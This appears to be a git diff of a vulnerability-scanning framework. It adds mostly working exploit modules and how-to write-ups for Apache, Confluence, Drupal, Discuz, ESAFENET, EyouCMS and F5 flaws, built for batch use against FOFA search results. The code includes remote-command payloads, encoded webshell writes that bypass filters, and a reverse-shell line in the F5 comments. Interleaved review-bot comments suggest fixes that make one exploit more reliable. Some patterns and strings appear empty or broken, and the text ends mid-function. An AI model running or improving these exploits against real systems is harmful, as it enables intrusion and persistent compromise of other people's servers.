b/Moudle/Apache/CVE_2021_41773.py 
@@ -0,0 +1,52 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME1='CVE-2021-41773' +NAME2='CVE-2021-42013' +AUTHOR="境心" +REMARK='Apache httpd 目录穿越漏洞' +FOFA_RULE='body="it works"' +###################################################### + +def poc(target): + result = {} + url = target+"/cgi-bin/" + res = requests.get(url, headers=headers, verify=False, timeout=5) + try: + banner = res.headers['server'] + except: + banner = "" + + data = "echo; id" + + if banner != "" and "Apache/2.4.49" in banner: + # target_url = url + ".%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" + # 坑点在这 + target_url = url + ".%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" + target_res = requests.post(target_url, headers=headers, data=data, verify=False, timeout=5) + if "uid" in target_res.text and "gid" in target_res.text and "groups" in target_res.text: + result['CVE'] = NAME1 + result['target_url'] = url + return result + if banner != "" and "Apache/2.4.50" in banner: + target_url = target + "/cgi-bin/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/bin/sh" + target_res = requests.post(target_url, headers=headers, data=data, verify=False, timeout=5) + if "uid" in target_res.text and "gid" in target_res.text and "groups" in target_res.text: + result['CVE'] = NAME2 + result['target_url'] = url + return result + + +if __name__ == '__main__': + # poc调用 + poc("http://127.0.0.1:8080") \ No newline at end of file 
diff --git a/Moudle/Confluence/CVE_2021_26084.py b/Moudle/Confluence/CVE_2021_26084.py new file mode 100644 index 0000000..517b5dc --- /dev/null +++ b/Moudle/Confluence/CVE_2021_26084.py 
@@ -0,0 +1,43 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from bs4 import BeautifulSoup + + + +######################################################################################################################## +# 脚本信息 +NAME='CVE_2021_26084' +AUTHOR="Trans" +REMARK='Confluence OGNL注入RCE' +FOFA_RULE='' +######################################################################################################################## + +def poc(target): + + result={} + url = target + "/pages/createpage-entervariables.action?SpaceKey=x" + session = requests.Session() + + try: + cmd = "echo goodluckboy" + xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"} + rawHTML = session.post(url, headers=headers, data=xpl_data) + + soup = BeautifulSoup(rawHTML.text, 'html.parser') + queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] + if 'goodluckboy' in queryStringValue: + result["target"] = target + result["poc"] = NAME + result["url"] = url + return + else: + pass + except: + pass + + +if __name__ == '__main__': + poc("127.0.0.1") \ No 
newline at end of file diff --git a/Moudle/Demo/Demo.py b/Moudle/Demo/Demo.py new file mode 100644 index 0000000..73cf3fa --- /dev/null +++ b/Moudle/Demo/Demo.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers + +requests.packages.urllib3.disable_warnings() + + +######################################################################################################################## +# 脚本信息 +NAME='Demo' +AUTHOR="RabbitMask" +REMARK='robots.txt敏感信息泄露' +FOFA_RULE='对应漏洞框架的fofa语法' +######################################################################################################################## +# 漏洞检测模块 +def poc(target): + result={} + try: + req = requests.get(target+'/robots.txt', headers=headers, timeout=3, verify=False) + if "Disallow" in req.text: + result['target'] = target + result['poc'] = NAME + result['xxx'] = '按需求随便写,删了都行' + return result + except: + pass +######################################################################################################################## + #以上为模板限制区域,以下为自由发挥区域 +######################################################################################################################## +# 漏洞利用模块 +def exp(target): + try: + req = requests.get(target+'/robots.txt', headers=headers, timeout=3, verify=False) + if "Disallow" in req.text: + print(req.text) + except: + pass + +if __name__ == '__main__': + exp('http://127.0.0.1') \ No newline at end of file diff --git a/Moudle/Demo/Test.py b/Moudle/Demo/Test.py new file mode 100644 index 0000000..438d6c4 --- /dev/null +++ b/Moudle/Demo/Test.py 
@@ -0,0 +1,42 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers + +requests.packages.urllib3.disable_warnings() + + +######################################################################################################################## +# 脚本信息 +NAME='Test' +AUTHOR="RabbitMask" +REMARK='万能test' +FOFA_RULE='' +######################################################################################################################## +# 漏洞检测模块 +def poc(target): + result={} + try: + req = requests.get(target+'/admin/login/user.properties', headers=headers, timeout=3, verify=False) + result['target'] = target + result['poc'] = NAME + result['status'] = req.status_code + result['text'] = req.text + return result + except: + pass +######################################################################################################################## + #以上为模板限制区域,以下为自由发挥区域 +######################################################################################################################## +# 漏洞利用模块 +def exp(target): + try: + req = requests.get(target+'/robots.txt', headers=headers, timeout=3, verify=False) + if "Disallow" in req.text: + print(req.text) + except: + pass + +if __name__ == '__main__': + exp('http://127.0.0.1') \ No newline at end of file diff --git a/Moudle/Discuz/discuz_version_change_getshell.md b/Moudle/Discuz/discuz_version_change_getshell.md new file mode 100644 index 0000000..923d0c2 --- /dev/null +++ b/Moudle/Discuz/discuz_version_change_getshell.md 
@@ -0,0 +1,89 @@ +# 1、漏洞描述 + +discuz! X系列的全版本,其产品升级/转换的功能存在漏洞,可利用构造的恶意语句,将shell写入到config.inc.php配置文件,从而实现getshell。 + +# 2、影响范围 + +discuz! X系列全版本 + +# 3、漏洞复现 + +漏洞利用的文件为utility/convert/index.php,选择其中一个版本,点击开始,抓取下一个页面的提交请求。 +![](images/image-20210903135314303.png) +![](images/image-20210903135652209.png) + +修改请求包的POST内容为如下,主要是修改红框中的内容: + +![](images/image-20210903135909982.png) + +``` +POST /Discuz_X3.2_SC_GBK/utility/convert/index.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 236 +Origin: http://127.0.0.1 +DNT: 1 +Connection: close +Referer: http://127.0.0.1/Discuz_X3.2_SC_GBK/utility/convert/index.php?a=config&source=d7.2_x2.0 +Upgrade-Insecure-Requests: 1 + +a=config&source=d7.2_x2.0&submit=yes&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(112).CHR(104).CHR(112).CHR(105).CHR(110).CHR(102).CHR(111).CHR(40).CHR(41).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaaaaaa +``` + +提交之后,相应的shell就写入到了/utility/convert/data/config.inc.php文件中,后面用蚁剑、冰蝎什么的连就可以了。 + +# 4、坑点 + +POST包中的source参数内容,为目标现在的版本,如果不对,提交请求会无效的。因版本比较多,手工党问题不大,但脚本批量的话,脚本中这个参数的值不多的话,大概率会漏报。 + +这里无论是漏洞利用的URL,还是最终写入到的URL中的文件,都有一个问题,那就是utility目录所在的位置,对于不同的站来说,很有可能不固定。网上下载的源码,这个目录是在网站根目录的上一级目录,手工的时候注意一下。脚本中是默认此目录在网站根目录了。 + +最重要的poc/exp的内容,其明文部分是eval("phpinfo();"); 只需要改双引号中的内容即可,比如shell为eval("$_POST['pass'];"); 但最终要转换为CHR类型的值。其中这个POST参数中的%0a%0d代表的是回车换行,在python中为\x0a\x0d,是为了躲避检查。CHR与STRING转换的脚本放在下面了。 + +# 5、CHR与STRING转换 + +## 5.1、CHR TO STRING + +``` +# _*_ coding:utf-8 _*_ + +import re + +list1 = [] +st = "CHR(60).CHR(63).CHR(112).CHR(104).CHR(112).CHR(32).CHR(101).CHR(99).CHR(104).CHR(111).CHR(32).CHR(39).CHR(97).CHR(98).CHR(99).CHR(39).CHR(59).CHR(63).CHR(62)" + +ss = 
re.findall('\((\d+)\)+',str(st)) +#print(ss) +for s in ss: + s = chr(int(s)) + list1.append(str(s)) + +s = "".join(list1) +print(s) +``` + +## 5.2、STRING TO CHR + +``` +# _*_ coding:utf-8 _*_ + + +list1 = [] +st = "" +for s in st: + chr_s = ord(s) + list1.append("CHR("+str(chr_s)+")") + +chr_ss = ".".join(list1) +print(chr_ss) +``` + +# 6、poc + +poc默认漏洞URL的主目录是在网站根目录下了,可能会有漏报,POST参数中的source,poc中已经尽可能的多写了,不排除会有漏报的情况出现。配合框架可批量,测试脚本可发现漏洞。 + +若要getshell,直接更改poc_key中的相关内容即可,漏洞复现中也有写。 diff --git a/Moudle/Discuz/discuz_version_change_getshell.py b/Moudle/Discuz/discuz_version_change_getshell.py new file mode 100644 index 0000000..ea2638f --- /dev/null +++ b/Moudle/Discuz/discuz_version_change_getshell.py 
@@ -0,0 +1,51 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='discuz_version_change_getshell' +AUTHOR="境心" +REMARK='discuz 版本转换功能getshell漏洞' +FOFA_RULE='app="Powered-by-Discuz!NT"' +FOFA_RULE='app="Tencent-Discuz"' ###这个也可以的 +###################################################### + +def poc(target): + result = {} + poc_key = 'newconfig[aaa\x0a\x0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(101).CHR(99).CHR(104).CHR(111).CHR(32).CHR(39).CHR(116).CHR(104).CHR(105).CHR(115).CHR(32).CHR(105).CHR(115).CHR(32).CHR(97).CHR(32).CHR(102).CHR(114).CHR(105).CHR(101).CHR(110).CHR(100).CHR(108).CHR(121).CHR(32).CHR(116).CHR(101).CHR(115).CHR(116).CHR(44).CHR(32).CHR(80).CHR(108).CHR(101).CHR(97).CHR(115).CHR(101).CHR(32).CHR(99).CHR(104).CHR(101).CHR(99).CHR(107).CHR(32).CHR(97).CHR(110).CHR(100).CHR(32).CHR(114).CHR(101).CHR(112).CHR(97).CHR(105).CHR(114).CHR(32).CHR(118).CHR(117).CHR(108).CHR(110).CHR(101).CHR(114).CHR(97).CHR(98).CHR(105).CHR(108).CHR(105).CHR(116).CHR(105).CHR(101).CHR(115).CHR(46).CHR(39).CHR(59).CHR(34).CHR(41).CHR(59));//]' + # utility目录在实际环境中的什么位置不确定,默认在网站根目录下,若不在网站根目录下的,会漏报 + vul_url = target+"/utility/convert/index.php" + # 经测试,这里source可以写多个,能匹配多个版本,又不影响getshell时的功能,source越多,漏报越少 + data = { + "a" :"config", + "source": "ss7.5_x2.0", + "source": "uch2.0_x2.0", + "source" : "d7.2_x2.0", + "source": "ss7.5_x1.5", + "source": "uch2.0_x1.0", + "source": "uch2.0_x1.5", + "source": "d7.2_x1.5", + "source": "d7.2_x1.0", + "source": "ss7.5_x1.0", + "submit" : "yes", + poc_key : "aaaa" + } + requests.post(vul_url, headers=headers, data=data, verify=False, timeout=5) + target_url = target+"/utility/convert/data/config.inc.php" + 
target_res = requests.get(target_url, headers=headers, verify=False, timeout=5) + if "this is a friendly test, Please check and repair vulnerabilities." in target_res.text: + result['poc_url'] = target_url + result['poc'] =NAME + result['message'] = "存在版本转换功能getshell漏洞" + return result + +if __name__ == '__main__': + poc("http://127.0.0.1/Discuz_X3.2_SC_GBK/") \ No newline at end of file diff --git a/Moudle/Discuz/images/image-20210903135314303.png b/Moudle/Discuz/images/image-20210903135314303.png new file mode 100644 index 0000000..682b7ac Binary files /dev/null and b/Moudle/Discuz/images/image-20210903135314303.png differ diff --git a/Moudle/Discuz/images/image-20210903135652209.png b/Moudle/Discuz/images/image-20210903135652209.png new file mode 100644 index 0000000..417bfe3 Binary files /dev/null and b/Moudle/Discuz/images/image-20210903135652209.png differ diff --git a/Moudle/Discuz/images/image-20210903135909982.png b/Moudle/Discuz/images/image-20210903135909982.png new file mode 100644 index 0000000..830a0f4 Binary files /dev/null and b/Moudle/Discuz/images/image-20210903135909982.png differ diff --git a/Moudle/Drupal/CVE_2018_7600.py b/Moudle/Drupal/CVE_2018_7600.py new file mode 100644 index 0000000..b249eab --- /dev/null +++ b/Moudle/Drupal/CVE_2018_7600.py 
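Review bot: The `data` dict literal repeats the `"source"` key nine times, and a Python dict keeps only the last value, so the request actually sends just `source=ss7.5_x1.0` — the comment claiming several versions are matched in one request does not describe what this code does, and PHP's `$_POST` would likewise keep only the last repeated value, so the versions have to be tried one request at a time (the .md's own "坑点" section says a wrong `source` makes the request a no-op). `FOFA_RULE` is also assigned twice, so only `app="Tencent-Discuz"` survives. Note that `poc()` itself writes `eval(...)` into the target's `/utility/convert/data/config.inc.php` with no cleanup, so a detection sweep leaves executable code in every hit's config file, and there is no `try/except` around the requests unlike the other modules.
```python
SOURCES = ["ss7.5_x2.0", "uch2.0_x2.0", "d7.2_x2.0", "ss7.5_x1.5", "uch2.0_x1.0",
           "uch2.0_x1.5", "d7.2_x1.5", "d7.2_x1.0", "ss7.5_x1.0"]
MARKER = "this is a friendly test, Please check and repair vulnerabilities."
for source in SOURCES:  # one version per request; a dict literal collapses repeated keys
    data = {"a": "config", "source": source, "submit": "yes", poc_key: "aaaa"}
    requests.post(vul_url, headers=headers, data=data, verify=False, timeout=5)
    target_res = requests.get(target_url, headers=headers, verify=False, timeout=5)
    if MARKER in target_res.text:
        break
# … unchanged: build and return the result dict …
```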
@@ -0,0 +1,64 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import re +import requests + +requests.packages.urllib3.disable_warnings() + +######################################################################################################################## +# 脚本信息 +NAME='CVE_2018_7600' +AUTHOR="RabbitMask" +REMARK='Drupal 7 RCE' +FOFA_RULE='app="Drupal-7"' +######################################################################################################################## +# 漏洞检测模块 +def poc(target): + result={} + cmd='whoami' + get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#type]':'markup', 'name[#markup]': cmd} + post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'} + try: + r = requests.post(target, params=get_params, data=post_params, verify=False,allow_redirects=False) + rule1 = re.compile(r'') + form_build_id = rule1.findall(r.text) + if form_build_id: + get_params = {'q':'file/ajax/name/#value/' + form_build_id[0]} + post_params = {'form_build_id':form_build_id[0]} + r = requests.post(target, params=get_params, data=post_params, verify=False) + rule2 = re.compile(r'(.*?)\[{"command":"settings","settings":.*?') + parsed_result=rule2.findall(r.text.replace('\n','').replace(' ','').replace('\r','').replace('\t','')) + if parsed_result and len(parsed_result[0])>0 and len(parsed_result[0])<100: + result['target']=target + result['poc']=NAME + result['whoami']=str(parsed_result[0]) + return result + except: + pass +######################################################################################################################## + #以上为模板限制区域,以下为自由发挥区域 +######################################################################################################################## +# 漏洞利用模块 +def exp(target,cmd): + get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#type]':'markup', 'name[#markup]': cmd} + post_params = 
{'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'} + try: + r = requests.post(target, params=get_params, data=post_params, verify=False,allow_redirects=False) + rule1 = re.compile(r'') + form_build_id = rule1.findall(r.text) + if form_build_id: + get_params = {'q':'file/ajax/name/#value/' + form_build_id[0]} + post_params = {'form_build_id':form_build_id[0]} + r = requests.post(target, params=get_params, data=post_params, verify=False) + rule2 = re.compile(r'(.*?)\[{"command":"settings","settings":.*?') + parsed_result=rule2.findall(r.text.replace('\n','').replace(' ','').replace('\r','').replace('\t','')) + if parsed_result and len(parsed_result[0])>0: + print(target,'Drupal-7',parsed_result[0]) + except: + pass + + + +if __name__ == '__main__': + exp('http://127.0.0.1') \ No newline at end of file diff --git a/Moudle/ESAFENET/CNVD_2021_26058.py b/Moudle/ESAFENET/CNVD_2021_26058.py new file mode 100644 index 0000000..2310d89 --- /dev/null +++ b/Moudle/ESAFENET/CNVD_2021_26058.py 
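Review bot: Both `requests.post` calls in `poc()` (and both in `exp()`) have no `timeout`, so one unresponsive host stalls a FOFA batch indefinitely, unlike the other modules which pass `timeout=3`–`5`; add `timeout=5` to each call. As rendered here `rule1 = re.compile(r'')` is an empty pattern — if that is how the file is committed rather than markup lost in rendering, `findall` returns `['']`, the `if form_build_id:` branch is taken with an empty id and the second request goes to `file/ajax/name/#value/` with nothing appended, so the intended `form_build_id` extraction never happens; confirm the pattern against the checked-in file. The bare `except: pass` then hides every such failure. `exp()` duplicates `poc()` except for the `cmd` argument and where the output goes; a shared `_run(target, cmd)` helper returning the parsed output would keep the two from drifting.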
@@ -0,0 +1,57 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import re +from Config.config_requests import headers + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME = 'CNVD_2021_26058' +AUTHOR = "JDQ" +REMARK = '亿赛通电子文档安全管理系统远程命令执行漏洞' +FOFA_RULE = 'title="电子文档安全管理系统"' +###################################################### + + +def poc(target): + try: + r = requests.get(target+"/solr/admin/cores",headers=headers, verify=False) + if r.status_code == 200 and 'responseHeader' in r.text: + result = re.search( + r'([\s\S]*?)', r.text, re.I + ) + core_name = result.group(1) + return(POC_2(target, core_name)) + except : + pass + + +def POC_2(target, core_name): + result={} + url = target + \ + "/solr/"+ core_name + "/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%
20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20" + files = { + 'stream.body': ''' + + + ''' + } + + try: + r = requests.post(url, data=files, verify=False) + if r.status_code == 200 and 'responseHeader' in r.text: + cmd = re.search( + r'documents">([\s\S]*?)', r.text, re.I) + res = cmd.group(1) + result['target'] = target + result['poc'] = NAME + result['whoami'] = res + return result + except: + pass + +if __name__ == '__main__': + poc("127.0.0.1") diff --git a/Moudle/EyouCMS/EyouCMS_qiantai_rce.md b/Moudle/EyouCMS/EyouCMS_qiantai_rce.md new file mode 100644 index 0000000..22e07a4 --- /dev/null +++ b/Moudle/EyouCMS/EyouCMS_qiantai_rce.md 
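Review bot: Neither the `requests.get` in `poc()` nor the `requests.post` in `POC_2()` sets a `timeout`, and the `__main__` call passes `"127.0.0.1"` without a scheme, which raises `MissingSchema` and is silently eaten by the bare `except:` — so the module prints nothing when run directly and hangs on dead hosts in batch. Add `timeout=5` to both calls and narrow to `except requests.RequestException:`. The patterns `r'([\s\S]*?)'` and `r'documents">([\s\S]*?)'` and the `stream.body` value appear to have lost their XML tags in this rendering; if they are really committed like this, `group(1)` matches the empty string at position 0 and `core_name` is `''`, so verify against the checked-in file. `re.search` can also return `None`, which should be guarded before `.group(1)` rather than relying on the except to catch the `AttributeError`.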
@@ -0,0 +1,79 @@ +# 1、漏洞描述 + +eyoucms V1.4.0版本存在远程命令执行漏洞,在网站前台无需任何辅助,可直接写入webshell。 + +漏洞影响版本只有一个,实际环境中能不能遇到,看脸了。。 + +# 2、影响范围 + +1.4.0单一版本 + +# 3、漏洞复现 + +## 3.1、坑点 + +先上POST包,提交后就在网站根目录下生成了testtest.php的poc文件: + +``` +POST /EyouCMS-V1.4.1-UTF8-SP2/?m=api&c=ajax&a=get_tag_memberlist HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-type: application/x-www-form-urlencoded +DNT: 1 +Connection: close +Cookie: PHPSESSID=q28egmgkmmogh09pm1gn9n2bj2; home_lang=cn; admin_lang=cn +Upgrade-Insecure-Requests: 1 +Content-Length: 297 + +attarray=eyJ7cGhwfTEyM3svcGhwfSI6ICJ7cGhwfWZpbGVfcHV0X2NvbnRlbnRzKCcuL3Rlc3R0ZXN0LnBocCcsYmFzZTY0X2RlY29kZShiJ1BEOXdhSEFnWldOb2J5QWlkR2hwY3lCcGN5QmhJR1p5YVdWdVpHeDVJSFJsYzNRc0lGQnNaV0Z6WlNCamFHVmpheUJoYm1RZ2NtVndZV2x5SUhWd2JHOWhaQ0IyZFd4dVpYSmhZbWxzYVhScFpYTXVJajgrJykpO3svcGhwfSJ9&htmlcode=111111 +``` + +如下图,注意箭头标的几个位置,POST方法、URL、X-Requested-With、attarray参数内容,尤其是X-Requested-With和attarray参数内容(payload),payload生成方法后面详说。 + +坑点在这: + +1. 若不是用的post方法,会失败; +2. URL中?后面的内容一定要按图中的这样写; +3. 请求的header中,X-Requested-With: XMLHttpRequest 一定要有,否则手工验证的时候,即使返回的读取成功,但还是没有写入成功shell; +4. 
payload生成过程踩过坑了,按下面3.2中的方法生成即可; + +![](image-20210908095353384.png) + +## 3.2、生成payload + +根据源码中的漏洞细节,其中eval会被替换为intval,需要将webshell进行base64加密传输绕过检测,同时构造将webshell写入目标机器的payload,将php标签转换为{php},将payload转换为数组格式,然后将数组转换为json格式,最后对其base64加密,生成最终的payload。 + +先看一下怎么用php生成这样的一个payload,上代码: + +=>符号左边的是数组名,可自定义;右边的是实际的payload,这里是写的一句话。 + +``` +"{php}file_put_contents('./testtest.php',base64_decode('PHBocCBldmFsKCRfUkVRVUVTVFtjZXNoaV0pOz8+'));{/php}"))); +``` + +再看一下python如何生成这样的一个payload,上代码: + +过程都是一样的。 + +``` +def creat_payload(): + payload_tmp1 = '''''' + payload_tmp1_base64 = base64.b64encode(payload_tmp1.encode('utf-8')) + payload_tmp2 = { + "{php}123{/php}": "{php}file_put_contents('./testtest.php',base64_decode(" + str( + payload_tmp1_base64) + "));{/php}" + } + payload = base64.b64encode(json.dumps(payload_tmp2).encode('utf-8')) + return payload +``` + +不过这里php生成的payload中,解密来看的话,/会被转义,即\/,但不影响实际效果。 + +# 4、poc + +搭配框架可批量,若要getshell,替换脚本中的payload_tmp1内容即可。 \ No newline at end of file diff --git a/Moudle/EyouCMS/EyouCMS_qiantai_rce.py b/Moudle/EyouCMS/EyouCMS_qiantai_rce.py new file mode 100644 index 0000000..f1f3fb4 --- /dev/null +++ b/Moudle/EyouCMS/EyouCMS_qiantai_rce.py 
@@ -0,0 +1,52 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +import base64 +import json +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='EyouCMS_qiantai_rce' +AUTHOR="境心" +REMARK='易优CMS前台RCE' +FOFA_RULE='app="eyoucms"' +###################################################### + +def creat_payload(): + payload_tmp1 = '''''' + payload_tmp1_base64 = base64.b64encode(payload_tmp1.encode('utf-8')) + payload_tmp2 = { + "{php}123{/php}": "{php}file_put_contents('./testtest.php',base64_decode(" + str( + payload_tmp1_base64) + "));{/php}" + } + payload = base64.b64encode(json.dumps(payload_tmp2).encode('utf-8')) + return payload + +def poc(target): + result = {} + url = target + "/?m=api&c=ajax&a=get_tag_memberlist" + headers = { + "User-Agent" : ua, + "X-Requested-With": "XMLHttpRequest", + "Content-type": "application/x-www-form-urlencoded" # 手工必须要有,脚本可以不用 + } + data = { + "attarray" : creat_payload(), + "htmlcode" : "testtest" + } + res = requests.post(url, data=data, headers=headers, verify=False, timeout=5) + if "this is a friendly test" in res.text: + result['message'] = "存在eyoucms前台RCE漏洞" + result['poc_url'] = target+"/testtest.php" + return result + +if __name__ == '__main__': + # poc调用 + poc("http://127.0.0.1/EyouCMS-V1.4.0-UTF8-SP2/index.php/") diff --git a/Moudle/EyouCMS/image-20210908095353384.png b/Moudle/EyouCMS/image-20210908095353384.png new file mode 100644 index 0000000..bb98b64 Binary files /dev/null and b/Moudle/EyouCMS/image-20210908095353384.png differ diff --git a/Moudle/F5/CVE_2020_5902.py b/Moudle/F5/CVE_2020_5902.py new file mode 100644 index 0000000..859c959 --- /dev/null +++ b/Moudle/F5/CVE_2020_5902.py 
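Review bot: `poc()` is a detection routine that writes `testtest.php` into the target's webroot and leaves it there; there is no cleanup and no separate `exp()`, so a scan over FOFA results plants a PHP file on every vulnerable host. `str(payload_tmp1_base64)` also yields the Python repr `b'...'`, which lands verbatim in the PHP as `base64_decode(b'...')` (visible in the .md's sample payload) and only works because PHP still tolerates the legacy `b` string prefix; use `payload_tmp1_base64.decode()` so the payload is what the write-up describes. As rendered, `payload_tmp1` is an empty string (its `<?php ... ?>` body appears to have been lost in rendering), in which case the `"this is a friendly test"` check can never match; confirm against the committed file. There is also no `try/except` around the request, so a connection error propagates out of `poc()` while the other modules swallow it.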
@@ -0,0 +1,54 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import json +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CVE-2020-5902' +AUTHOR="Joker" +REMARK='F5 BIG-IP 远程代码执行漏洞1' +FOFA_RULE='title="BIG-IP® ;- Redirect"或icon_hash="-335242539"' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" + # 其他漏洞触发点 + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/tmp + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release + #https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp + #https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/ + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin + # 反弹shell + # https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash + # https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/1.txt&content=bash+-i+>%26/dev/tcp/127.0.0.1/4444+0>%261 + # https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/1.txt + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", + "Accept-Language":"zh-CN,zh;q=0.9" + } + try: + 
